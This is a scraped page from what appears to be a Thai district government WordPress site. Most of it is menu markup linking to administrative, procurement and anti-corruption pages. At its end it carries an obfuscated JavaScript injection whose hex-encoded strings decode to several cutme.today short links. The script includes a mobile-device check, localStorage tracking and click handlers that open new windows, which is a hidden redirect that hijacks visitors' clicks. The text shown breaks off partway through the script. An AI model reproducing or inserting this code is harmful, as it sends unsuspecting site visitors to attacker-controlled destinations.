href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b37671-e5\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b37671-e5\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_317e6f-33\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_317e6f-33\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_4e465f-3b\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_4e465f-3b\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9028d2-dc\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9028d2-dc\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_98736b-ac\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_98736b-ac\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_61f4d2-80\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_61f4d2-80\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_67b463-61\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_67b463-61\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\" data-type=\"page\" data-id=\"1032\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9c9020-fa\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9c9020-fa\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1020\" data-type=\"page\" data-id=\"1020\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_f729cb-3e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f729cb-3e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_893939-da\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_893939-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 